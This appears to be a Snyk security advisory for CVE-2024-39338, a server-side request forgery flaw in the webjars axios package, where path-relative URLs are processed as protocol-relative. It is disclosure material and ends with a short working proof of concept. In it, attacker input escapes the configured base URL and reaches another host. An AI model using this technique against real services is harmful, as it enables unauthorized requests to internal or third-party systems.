Server-side Request Forgery (SSRF) Affecting org.webjars.bower:axios package, versions [1.3.2,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.08% (37th percentile)
- Snyk ID SNYK-JAVA-ORGWEBJARSBOWER-7675624
- published 11 Aug 2024
- disclosed 24 Jun 2024
- credit jeffhacks
Introduced: 24 Jun 2024
CVE-2024-39338
How to fix?
A fix was pushed into the master branch but not yet published.
Overview
org.webjars.bower:axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.
PoC
const axios = require('axios');

// Client bound to a trusted base URL; every request is meant to stay on this host.
const client = axios.create({
  baseURL: 'https://userapi.example.com',
});

// const userId = '12345'; // expected input: a plain identifier
const userId = '/google.com'; // attacker-controlled input that starts with '/'

// `/${userId}` becomes '//google.com'; affected versions treat this as a
// protocol-relative URL and ignore baseURL, so the request leaves the host.
client.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL: ${response.config.baseURL}`);
  console.log(`config.method: ${response.config.method}`);
  console.log(`config.url: ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});
Output:
config.baseURL: https://userapi.example.com
config.method: get
config.url: //google.com
res.responseUrl: http://www.google.com/